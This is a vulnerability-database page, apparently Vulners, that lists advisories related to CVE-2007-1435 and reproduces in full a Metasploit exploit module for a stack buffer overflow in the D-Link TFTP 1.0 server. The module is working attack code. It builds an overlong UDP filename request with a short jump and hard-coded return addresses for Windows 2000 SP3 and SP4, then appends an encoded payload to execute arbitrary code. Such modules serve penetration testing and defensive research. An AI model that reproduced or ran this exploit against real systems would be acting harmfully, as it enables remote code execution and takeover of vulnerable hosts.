Lucene search
K

D-Link TFTP 1.0 Long Filename Buffer Overflow

🗓️ 26 Feb 2009 08:19:01Reported by LSO <[email protected]>, aushack <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 34 Views

D-Link TFTP 1.0 Long Filename Buffer Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2007-1435
9 May 201000:00
circl
CVE
CVE-2007-1435
13 Mar 200719:00
cve
Cvelist
CVE-2007-1435
13 Mar 200719:00
cvelist
Exploit DB
D-Link TFTP 1.0 - &#039;Filename&#039; Remote Buffer Overflow (Metasploit)
9 May 201000:00
exploitdb
Exploit DB
D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow
12 Mar 200700:00
exploitdb
exploitpack
D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow
12 Mar 200700:00
exploitpack
NVD
CVE-2007-1435
13 Mar 200719:19
nvd
Packet Storm
D-Link TFTP 1.0 Long Filename Buffer Overflow
26 Nov 200900:00
packetstorm
Prion
Buffer overflow
13 Mar 200719:19
prion
securityvulns
D-Link TFTP server memory corruption
18 Mar 200700:00
securityvulns
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in D-Link TFTP 1.0.
        By sending a request for an overly long file name, an attacker
        could overflow a buffer and execute arbitrary code. For best results,
        use bind payloads with nonx (No NX).
      },
      'Author'         =>
        [
          'LSO <lso[at]hushmail.com>', # Exploit module
          'aushack', # Refs, stability, targets etc
        ],
      'References'     =>
        [
          [ 'CVE', '2007-1435' ],
          [ 'OSVDB', '33977' ],
          [ 'BID', '22923' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00",
          'Compat'   =>
          {
            'ConnectionType' => '-reverse',
          },
        },
      'SaveRegisters'  => [ 'ecx', 'eax', 'esi' ],
      'Platform'       => 'win',

      'Targets'        =>
        [
          # Patrick tested OK 20090228
          ['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
          ['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2007-03-12',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(69)
      ], self)
  end

  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    juju = "\x00\x01"
    juju << Rex::Text.rand_text_alpha_upper(581)
    juju << Rex::Arch::X86.jmp_short(42)
    juju << Rex::Text.rand_text_alpha_upper(38)
    juju << [target.ret].pack('V') + payload.encoded

    udp_sock.put(juju)

    handler
    disconnect_udp
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation